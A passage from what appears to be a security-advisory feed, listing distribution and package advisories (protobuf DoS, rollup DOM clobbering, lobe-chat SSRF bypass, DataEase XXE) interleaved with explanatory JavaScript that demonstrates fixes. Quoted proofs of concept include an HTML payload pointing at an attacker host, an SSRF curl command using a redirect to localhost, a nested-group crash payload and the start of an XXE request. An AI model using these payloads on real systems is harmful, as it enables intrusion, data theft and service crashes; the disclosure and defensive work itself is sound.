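// spellings that collide with another header after normalisation.
function clobberAttempts(headers) {
  const byKey = new Map();
  for (const [name] of headers) {
    const k = envKey(name);
    if (!byKey.has(k)) byKey.set(k, new Set());
    byKey.get(k).add(name);
  }
  return [...byKey.values()]
    .filter((names) => names.size > 1)
    .flatMap((names) => [...names].filter((n) => n.includes('_')));
}

// Constructed request as the app server sees it: proxy-set headers first,
// then the attacker's underscore variants.
const REQUEST_HEADERS = [
  ['Host', 'app.example'],
  ['X-Forwarded-For', '203.0.113.7'],
  ['X-Forwarded-Proto', 'https'],
  ['X-Forwarded_For', '10.0.0.1'],
  ['X-Forwarded_Proto', 'http'],
];

console.log('vulnerable:', normalizeHeadersVulnerable(REQUEST_HEADERS));
console.log('fixed:     ', normalizeHeadersFixed(REQUEST_HEADERS));
console.log('attempts:  ', clobberAttempts(REQUEST_HEADERS));
```

In the vulnerable result `HTTP_X_FORWARDED_PROTO` is `http`, which is exactly the downgrade the advisory warns about; in the fixed result the proxy's `https` survives. The nginx `underscores_in_headers` default (off) achieves the same by dropping underscore names before they reach the app server.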
20.09.2024 15:01:19almalinux[ALSA-2024:6837] pcp security update (important)pcp security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6837
20.09.2024 17:08:36almalinux[ALSA-2024:6848] pcp security update (important)pcp security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6848
20.09.2024 21:47:22rubysec[RUBYSEC:GOOGLE-PROTOBUF-2024-7254] protobuf-java has potential Denial of Service issue

### Summary

When parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.

Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team <ecosystem@trailofbits.com>

Affected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.

### Severity

[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254) **High** CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)

This is a potential Denial of Service. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.

### Proof of Concept

For reproduction details, please refer to the unit tests (Protobuf Java [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java) and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java)) that identify the specific inputs that exercise this parsing weakness.

### Remediation and Mitigation

We have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:

* protobuf-java (3.25.5, 4.27.5, 4.28.2)
* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)
* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)
* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)
* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:GOOGLE-PROTOBUF-2024-7254
20.09.2024 16:13:37almalinux[ALSA-2024:6757] libnbd security update (moderate)libnbd security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6757
20.09.2024 21:08:29almalinux[ALSA-2024:6681] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6681
20.09.2024 21:06:46almalinux[ALSA-2024:6683] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6683
22.09.2024 05:04:29fedora[FEDORA-2024-3d29b1647b] Fedora 39: chromium (high)update to 129.0.6668.58 * High CVE-2024-8904: Type Confusion in V8 * Medium CVE-2024-8905: Inappropriate implementation in V8 * Medium CVE-2024-8906: Incorrect security UI in Downloads * Medium CVE-2024-8907: Insufficient data validation in Omnibox * Low CVE-2024-8908: Inappropriate implementation in Autofill * Low CVE-2024-8909: Inappropriate implementation in UIhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3d29b1647b
22.09.2024 05:04:14fedora[FEDORA-2024-c94f884440] Fedora 39: less (high)Security fix for CVE-2024-32487 - less with LESSOPEN mishandles \n in pathshttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c94f884440
22.09.2024 03:15:59fedora[FEDORA-2024-4b5f3d51ca] Fedora 41: jupyterlab, python-notebook (medium)Update jupyterlab and python-notebook to fix CVE-2024-43805.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4b5f3d51ca
22.09.2024 03:15:35fedora[FEDORA-2024-3ecdf562bf] Fedora 41: openjpeg (medium)Backport fix for CVE-2023-39327.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3ecdf562bf
22.09.2024 02:59:39rubysec[RUBYSEC:GOOGLE-PROTOBUF-2024-7254] protobuf-java has potential Denial of Service issue (high)

### Summary

When parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.

Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team <ecosystem@trailofbits.com>

Affected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.

### Severity

[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254) **High** CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)

This is a potential Denial of Service. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.

### Proof of Concept

For reproduction details, please refer to the unit tests (Protobuf Java [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java) and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java)) that identify the specific inputs that exercise this parsing weakness.

### Remediation and Mitigation

We have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:

* protobuf-java (3.25.5, 4.27.5, 4.28.2)
* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)
* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)
* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)
* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:GOOGLE-PROTOBUF-2024-7254
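Both CVE-2024-7254 entries above describe the same failure: skipping unknown fields recurses once per nested group, with no bound. The following is an added example in JavaScript, not the protobuf-java fix, of a minimal unknown-field skipper over the protobuf wire format with the kind of nesting limit the fix introduces. Group fields (wire types 3 and 4) recurse until their matching end tag; the depth check turns an attacker's deeply nested groups into a controlled error instead of a stack overflow. The payloads, field numbers and limit are constructed.

```javascript
// Added example, not protobuf-java code: depth-limited skipping of unknown
// fields in protobuf wire format. Payloads below are constructed.

// Decode one varint; returns [value, nextPos]. Values beyond 2^53 are not
// needed here, so plain number arithmetic is used instead of BigInt.
function readVarint(buf, pos) {
  let value = 0;
  let shift = 0;
  for (;;) {
    if (pos >= buf.length) throw new Error('truncated varint');
    const b = buf[pos++];
    value += (b & 0x7f) * 2 ** shift;
    if ((b & 0x80) === 0) return [value, pos];
    shift += 7;
    if (shift > 63) throw new Error('varint too long');
  }
}

function advance(buf, pos, n) {
  if (pos + n > buf.length) throw new Error('truncated field');
  return pos + n;
}

// Skip the payload of a field whose tag (fieldNumber, wireType) has been read.
// Groups recurse until their matching end-group tag; `depth` is compared to
// `maxDepth` before recursing, which is the bound that prevents the crash.
function skipField(buf, pos, fieldNumber, wireType, depth, maxDepth) {
  switch (wireType) {
    case 0: return readVarint(buf, pos)[1];          // varint
    case 1: return advance(buf, pos, 8);             // fixed64
    case 5: return advance(buf, pos, 4);             // fixed32
    case 2: {                                        // length-delimited
      const [len, p] = readVarint(buf, pos);
      return advance(buf, p, len);
    }
    case 3: {                                        // start group
      if (depth >= maxDepth) throw new Error(`group nesting deeper than ${maxDepth}`);
      for (;;) {
        const [tag, p] = readVarint(buf, pos);
        const num = Math.floor(tag / 8);
        const wt = tag & 7;
        if (wt === 4) {                              // end group
          if (num !== fieldNumber) throw new Error('mismatched end-group tag');
          return p;
        }
        pos = skipField(buf, p, num, wt, depth + 1, maxDepth);
      }
    }
    case 4: throw new Error('end-group tag without a start');
    default: throw new Error(`unknown wire type ${wireType}`);
  }
}

// Skip every field in `buf` as if none were known; returns bytes consumed.
function skipUnknownFields(buf, maxDepth = 100) {
  let pos = 0;
  while (pos < buf.length) {
    const [tag, p] = readVarint(buf, pos);
    pos = skipField(buf, p, Math.floor(tag / 8), tag & 7, 0, maxDepth);
  }
  return pos;
}

// Constructed attack payload: field 1 opened as a group `n` times, then closed
// `n` times. Tag bytes: (1 << 3) | 3 = 0x0b starts a group, (1 << 3) | 4 = 0x0c ends it.
function nestedGroups(n) {
  return Uint8Array.from([...Array(n).fill(0x0b), ...Array(n).fill(0x0c)]);
}

// Constructed benign message: field 2 = varint 300, field 3 = bytes "AB".
const BENIGN = Uint8Array.from([0x10, 0xac, 0x02, 0x1a, 0x02, 0x41, 0x42]);

console.log('benign bytes consumed:', skipUnknownFields(BENIGN));
try {
  skipUnknownFields(nestedGroups(100000), 100);
} catch (e) {
  console.log('rejected:', e.message);
}
```

Two bytes per nesting level is all an attacker needs, so a few hundred kilobytes of `0x0b` is enough to exhaust a default thread stack in a parser without the bound. Any skip or discard path that recurses on groups, including map-field handling, needs the same limit, which is what the advisory's list of affected parsers reflects.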
23.09.2024 12:59:41ubuntu[USN-7007-2] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7007-2
23.09.2024 04:02:26fedora[FEDORA-2024-5cd6011cf7] Fedora 39: openssl (high)Patch for CVE-2024-6119https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5cd6011cf7
23.09.2024 03:56:48ubuntu[USN-6992-2] Firefox regressionsUSN-6992-1 caused some minor regressions in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6992-2
23.09.2024 03:17:20fedora[FEDORA-2024-b85d941d78] Fedora 41: chromium (high)update to 129.0.6668.58High CVE-2024-8904: Type Confusion in V8Medium CVE-2024-8905: Inappropriate implementation in V8Medium CVE-2024-8906: Incorrect security UI in DownloadsMedium CVE-2024-8907: Insufficient data validation in OmniboxLow CVE-2024-8908: Inappropriate implementation in AutofillLow CVE-2024-8909: Inappropriate implementation in UIhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b85d941d78
23.09.2024 03:16:42fedora[FEDORA-2024-5d6c951b0b] Fedora 41: iwdiwd 2.22:Fix issue with handling the Affinities property.Fix issue with handling ConnectedAccessPoint signal when roaming.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5d6c951b0b
22.09.2024 05:21:47fedora[FEDORA-2024-a3a82a256d] Fedora 40: python-jupyterlab-server, jupyterlab, python-notebook (medium)Update jupyterlab and python-notebook to fix CVE-2024-43805.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a3a82a256d
22.09.2024 13:28:31rustsec[RUSTSEC-2024-0374] Segmentation fault due to use of uninitialized memoryWhen trying to decompress a file using "ouch", we can reach the function "ouch::archive::zip::convert_zip_date_time". In the function, there is an unsafe function, "transmute". Once the "transmute" function is called to convert the type of the "month" object, the address of the object is changed to the uninitialized memory region. After that, when another function tries to dereference "month", a segmentation fault occurs.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0374
24.09.2024 11:08:46ubuntu[USN-7030-1] py7zr vulnerabilitypy7zr could be made to create arbitrary files when extracting the contentsof a specially crafted 7z archive.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7030-1
24.09.2024 03:00:00redhat[RHSA-2024:6961] python3.12 security update (moderate)Python 3.12 is an accessible, high-level, dynamically typed, interpreted programming language, designed with an emphasis on code readability. It includes an extensive standard library, and has a vast ecosystem of third-party libraries. The python3.12 package provides the "python3.12" executable: the reference interpreter for the Python language, version 3. The majority of its standard library is provided in the python3.12-libs package, which should be installed automatically along with python3.12. The remaining parts of the Python standard library are broken out into the python3.12-tkinter and python3.12-test packages, which may need to be installed separately. Documentation for Python is provided in the python3.12-docs package. Packages containing additional libraries for Python are generally named with the "python3.12-" prefix. For the unversioned "python" executable, see manual page "unversioned-python".Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)* python: cpython: Iterating over a malicious ZIP file may lead to Denial of Service (CVE-2024-8088)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6961
24.09.2024 03:00:00redhat[RHSA-2024:6962] python3.11 security update (moderate)Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)* python: cpython: From NVD collector (CVE-2024-8088)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6962
24.09.2024 03:00:00redhat[RHSA-2024:7001] kernel-rt security update (important)The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): CVE-2023-6040 CVE-2024-26595 CVE-2021-46984 CVE-2023-52478 CVE-2023-52476 CVE-2023-52522 CVE-2021-47101 CVE-2021-47097 CVE-2023-52605 CVE-2024-26645 CVE-2024-26665 CVE-2024-26720 CVE-2024-26717 CVE-2024-26769 CVE-2024-26894 CVE-2024-26880 CVE-2024-26855 CVE-2024-26923 CVE-2024-26939 CVE-2024-27013 CVE-2024-27042 CVE-2024-35809 CVE-2023-52683 CVE-2024-35884 CVE-2024-35877 CVE-2024-35944 CVE-2024-35989 CVE-2021-47412 CVE-2021-47393 CVE-2021-47386 CVE-2021-47385 CVE-2021-47384 CVE-2021-47383 CVE-2021-47432 CVE-2021-47352 CVE-2021-47338 CVE-2021-47321 CVE-2021-47289 CVE-2021-47287 CVE-2023-52817 CVE-2023-52840 CVE-2021-47441 CVE-2021-47466 CVE-2021-47455 CVE-2021-47497 CVE-2021-47560 CVE-2021-47527 CVE-2024-36883 CVE-2024-36920 CVE-2024-36902 CVE-2024-36953 CVE-2024-36939 CVE-2024-36901 CVE-2021-47582 CVE-2021-47609 CVE-2024-38619 CVE-2022-48754 CVE-2022-48760 CVE-2024-38581 CVE-2024-38570 CVE-2024-38559 CVE-2024-38558 CVE-2024-37356 CVE-2024-39471 CVE-2024-39499 CVE-2024-39501 CVE-2024-39506 CVE-2024-40904 CVE-2024-40911 CVE-2024-40912 CVE-2024-40929 CVE-2024-40931 CVE-2024-40941 CVE-2024-40954 CVE-2024-40958 CVE-2024-40959 CVE-2024-40960 CVE-2024-40972 CVE-2024-40977 CVE-2024-40978 CVE-2024-40988 CVE-2024-40989 CVE-2024-40995 CVE-2024-40997 CVE-2024-40998 CVE-2024-41005 CVE-2024-40901 CVE-2024-41007 CVE-2024-41008 CVE-2022-48804 CVE-2022-48836 CVE-2022-48866 CVE-2024-41090 CVE-2024-41091 CVE-2024-41012 CVE-2024-41013 CVE-2024-41014 CVE-2024-41035 CVE-2024-41038 CVE-2024-41039 CVE-2024-41040 CVE-2024-41041 CVE-2024-41044 CVE-2024-41055 CVE-2024-41056 CVE-2024-41060 CVE-2024-41071 CVE-2024-41076 CVE-2024-41097 CVE-2024-42084 CVE-2024-42090 CVE-2024-42096 CVE-2024-42114 CVE-2024-42124 CVE-2024-42131 CVE-2024-42152 CVE-2024-42154 
CVE-2024-42226 CVE-2024-42228 CVE-2024-42237 CVE-2024-42238 CVE-2024-42240 CVE-2024-42246 CVE-2024-42322 CVE-2024-43871 For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:7001
24.09.2024 01:11:05npm[NPM:GHSA-GCX4-MW62-G8WM] DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS (high)

### Summary

A DOM Clobbering vulnerability was discovered in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.

It's worth noting that similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) have been reported, which might serve as a good reference.

### Details

#### Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markup in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of JS code) living in the existing JavaScript code to transform it into executable code. For more information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

#### Gadget found in `rollup`

A DOM Clobbering vulnerability in `rollup` bundled scripts was identified, particularly when the scripts use `import.meta` and set output in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces the meta property with the URL retrieved from `document.currentScript`.

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

### PoC

Considering a website that contains the following `main.js` script, the developer decides to use `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`.

```js
var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)
```

The output `bundle.js` is shown in the following code snippet.

```js
'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);
```

Adding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`, due to the gadget introduced during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

```html
<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>
```

### Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users to inject certain scriptless HTML tags without properly sanitizing the `name` or `id` attributes.

### Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

```ts
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(relativePath)}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
  );
```

```ts
const getUrlFromDocument = (chunkId: string, umd = false) =>
  `${
    umd ? `typeof document === 'undefined' ? location.href : ` : ''
  }(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
    chunkId
  )}', document.baseURI).href)`;
```

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GCX4-MW62-G8WM
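The gadget and the patch, reproduced outside a browser as an added example in JavaScript (not rollup's code). A stand-in `document` object models named property access, where an element whose `name` or `id` matches a property shadows the built-in `currentScript`; against it the example runs the URL resolution the vulnerable bundle performed and the hardened form from the patch above, which only trusts a real `<script>`. The hosts, element objects and chunk id are constructed, and `extra.js` is resolved with `URL()` rather than the PoC's string concatenation so the result is a well-formed URL.

```javascript
// Added example, not rollup's code. Constructed stand-in DOM objects.

// Stand-in for the browser's named property access on `document`: an element
// whose name or id matches a property name shadows the built-in property.
function makeDocument({ baseURI, currentScript, namedElements = [] }) {
  const doc = { baseURI };
  Object.defineProperty(doc, 'currentScript', {
    get() {
      const clobbered = namedElements.find(
        (el) => el.name === 'currentScript' || el.id === 'currentScript',
      );
      return clobbered || currentScript;
    },
  });
  return doc;
}

// Before the patch: whatever `document.currentScript` returns is trusted.
function chunkUrlVulnerable(doc, chunkId) {
  const cs = doc.currentScript;
  return (cs && cs.src) || new URL(chunkId, doc.baseURI).href;
}

// After the patch: the element must really be a <script>; otherwise fall back
// to resolving the chunk id against document.baseURI.
function chunkUrlHardened(doc, chunkId) {
  const cs = doc.currentScript;
  return (
    (cs && cs.tagName.toUpperCase() === 'SCRIPT' && cs.src) ||
    new URL(chunkId, doc.baseURI).href
  );
}

// The PoC's `import.meta.url + 'extra.js'`, resolved as a URL.
function extraScriptUrl(resolveChunkUrl, doc, chunkId) {
  return new URL('extra.js', resolveChunkUrl(doc, chunkId)).href;
}

// Constructed elements: the page's genuine bundle <script> and the attacker's
// script-less <img name="currentScript">.
const REAL_SCRIPT = { tagName: 'SCRIPT', src: 'https://app.example/static/bundle.js' };
const ATTACKER_IMG = { tagName: 'IMG', name: 'currentScript', src: 'https://attacker.controlled.server/' };

const CLEAN_PAGE = makeDocument({ baseURI: 'https://app.example/page', currentScript: REAL_SCRIPT });
const CLOBBERED_PAGE = makeDocument({
  baseURI: 'https://app.example/page',
  currentScript: REAL_SCRIPT,
  namedElements: [ATTACKER_IMG],
});

console.log('vulnerable, clobbered:', extraScriptUrl(chunkUrlVulnerable, CLOBBERED_PAGE, 'bundle.js'));
console.log('hardened,   clobbered:', extraScriptUrl(chunkUrlHardened, CLOBBERED_PAGE, 'bundle.js'));
console.log('hardened,   clean:    ', extraScriptUrl(chunkUrlHardened, CLEAN_PAGE, 'bundle.js'));
```

The hardened path loses the real script URL on a clobbered page and falls back to a `baseURI`-relative chunk URL, which is the same fallback rollup already used when `currentScript` was unavailable; the important property is that the attacker's host never appears. The tag check is sufficient because script-less HTML injection cannot produce an element whose `tagName` is `SCRIPT`.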
23.09.2024 23:30:12npm[NPM:GHSA-3FC8-2R3F-8WRG] lobe-chat implemented an insufficient fix for GHSA-mxhq-xw3g-rphc (CVE-2024-32964) (critical)

### Summary

The SSRF protection implemented in https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts does not consider redirects and could be bypassed when an attacker provides an external malicious URL which redirects to internal resources like a private network or loopback address.

### PoC

1. Run lobe-chat in a docker container. In my setup lobe-chat runs on 0.0.0.0:3210;
2. Create the file dummy-server.js with the following content:

```js
var http = require('http');
console.log("running server");
http.createServer(function (req, res) {
  console.log(req.url);
  res.writeHead(200, {'Content-Type': 'text/html'});
  res.end();
}).listen(3001, 'localhost');
```

And run `node dummy-server.js` as an example server inside of container [1] (or in the container's private network).

3. Run in a terminal to perform the request to the lobe-chat instance from [1]:

```
curl --path-as-is -i -s -k -X $'POST' \
  -H $'Host: 0.0.0.0:3210' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://0.0.0.0:3210/settings/agent?agent=&session=inbox&tab=' -H $'Content-Type: text/plain;charset=UTF-8' -H $'Content-Length: 74' -H $'Origin: http://0.0.0.0:3210' -H $'Connection: keep-alive' -H $'Priority: u=0' \
  -b $'LOBE_LOCALE=en-EN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined' \
  --data-binary $'http://130.193.49.129:8090/redirect?url=http://localhost:3001/iamssrf_1337' \
  $'http://0.0.0.0:3210/api/proxy'
```

where the body contains the URL of a server which redirects to the internal network (in my case it redirects according to the url parameter).

4. Observe in the output of [2]:

```
running server
/iamssrf_1337
```

5. The attacker is able to perform SSRF attacks against lobe-chat despite the https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts#L26 check.

### Fix recommendations:

1. Disable redirects - lobe-chat should consider explicitly disabling redirects.
2. If redirect support is required, perform the check before each HTTP request.

### Impact

https://portswigger.net/web-security/ssrf

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3FC8-2R3F-8WRG
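The second fix recommendation, carried out as an added example in JavaScript that is not lobe-chat's code: redirects are followed manually and every hop passes the same destination check as the URL the client submitted, so a `302` to `localhost` is refused at hop 1 while a benign same-site redirect still completes. The redirector host and the stub fetcher are constructed so the example runs offline. Caveat: this checks literal addresses and a small hostname deny-list only; a production guard also resolves DNS itself and connects to the address it validated, so a name cannot be rebound between check and connect.

```javascript
// Added example, not lobe-chat's code. Constructed hosts and a stub fetch().

function ipv4ToInt(ip) {
  const parts = ip.split('.');
  if (parts.length !== 4 || parts.some((p) => !/^\d{1,3}$/.test(p) || Number(p) > 255)) return null;
  return parts.reduce((acc, p) => acc * 256 + Number(p), 0);
}

// "this" network, private, CGNAT, loopback, link-local, multicast, reserved.
const BLOCKED_IPV4 = [
  ['0.0.0.0', 8], ['10.0.0.0', 8], ['100.64.0.0', 10], ['127.0.0.0', 8],
  ['169.254.0.0', 16], ['172.16.0.0', 12], ['192.168.0.0', 16],
  ['224.0.0.0', 4], ['240.0.0.0', 4],
];

function isBlockedIPv4(ip) {
  const n = ipv4ToInt(ip);
  if (n === null) return false;
  return BLOCKED_IPV4.some(([base, bits]) => {
    const mask = (0xffffffff << (32 - bits)) >>> 0;
    return ((n & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
  });
}

// IPv6 literals come from URL.hostname already compressed and lower-cased.
function isBlockedIPv6(ip) {
  const h = ip.toLowerCase();
  return h === '::1' || h === '::' || h.startsWith('::ffff:') // loopback, unspecified, IPv4-mapped
    || /^f[cd]/.test(h) || /^fe[89ab]/.test(h);              // fc00::/7, fe80::/10
}

// Expects a hostname as produced by `new URL()`, which already folds case and
// rewrites shorthand IPv4 such as 127.1 or 0x7f000001 to dotted form.
function isForbiddenHost(hostname) {
  const h = hostname.toLowerCase().replace(/\.$/, '');
  if (h.startsWith('[') && h.endsWith(']')) return isBlockedIPv6(h.slice(1, -1));
  if (h === 'localhost' || h.endsWith('.localhost')) return true;
  if (/^\d+(\.\d+){3}$/.test(h)) return isBlockedIPv4(h);
  return false;
}

const REDIRECT_STATUSES = new Set([301, 302, 303, 307, 308]);

// Follow redirects manually so each hop is checked like the first URL.
async function safeFetch(startUrl, fetchImpl, maxRedirects = 5) {
  let url = new URL(startUrl);
  for (let hop = 0; ; hop++) {
    if (url.protocol !== 'http:' && url.protocol !== 'https:') throw new Error(`blocked: scheme ${url.protocol}`);
    if (isForbiddenHost(url.hostname)) throw new Error(`blocked: ${url.hostname} at hop ${hop}`);
    const res = await fetchImpl(url.href, { redirect: 'manual' });
    if (!REDIRECT_STATUSES.has(res.status)) return res;
    if (hop >= maxRedirects) throw new Error('blocked: too many redirects');
    const location = res.headers.get('location');
    if (!location) throw new Error('blocked: redirect without Location');
    url = new URL(location, url); // relative Location resolves against the current hop
  }
}

// Constructed stand-in for fetch(): a fixed response table, no network.
function makeStubFetch(table) {
  return async (href) => {
    const entry = table[href] || { status: 404 };
    return { status: entry.status, url: href, headers: new Map(Object.entries(entry.headers || {})) };
  };
}

const STUB_FETCH = makeStubFetch({
  'http://redirector.example/r': { status: 302, headers: { location: 'http://localhost:3001/iamssrf_1337' } },
  'http://localhost:3001/iamssrf_1337': { status: 200 },
  'https://api.example/old': { status: 301, headers: { location: '/v1/models' } },
  'https://api.example/v1/models': { status: 200 },
});

safeFetch('http://redirector.example/r', STUB_FETCH)
  .then((r) => console.log('unexpected success', r.url), (e) => console.log(e.message));
safeFetch('https://api.example/old', STUB_FETCH)
  .then((r) => console.log('ok', r.status, r.url), (e) => console.log(e.message));
```

With the real `fetch`, `redirect: 'manual'` is what stops the runtime from following the `Location` header on its own; the first recommendation in the advisory (no redirects at all) is this loop with `maxRedirects = 0`.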
23.09.2024 23:27:25maven[MAVEN:GHSA-4M9P-7XG6-F4MM] DataEase has an XML External Entity Reference vulnerability (high)

### Impact

There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.

1. Send the request:

```
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
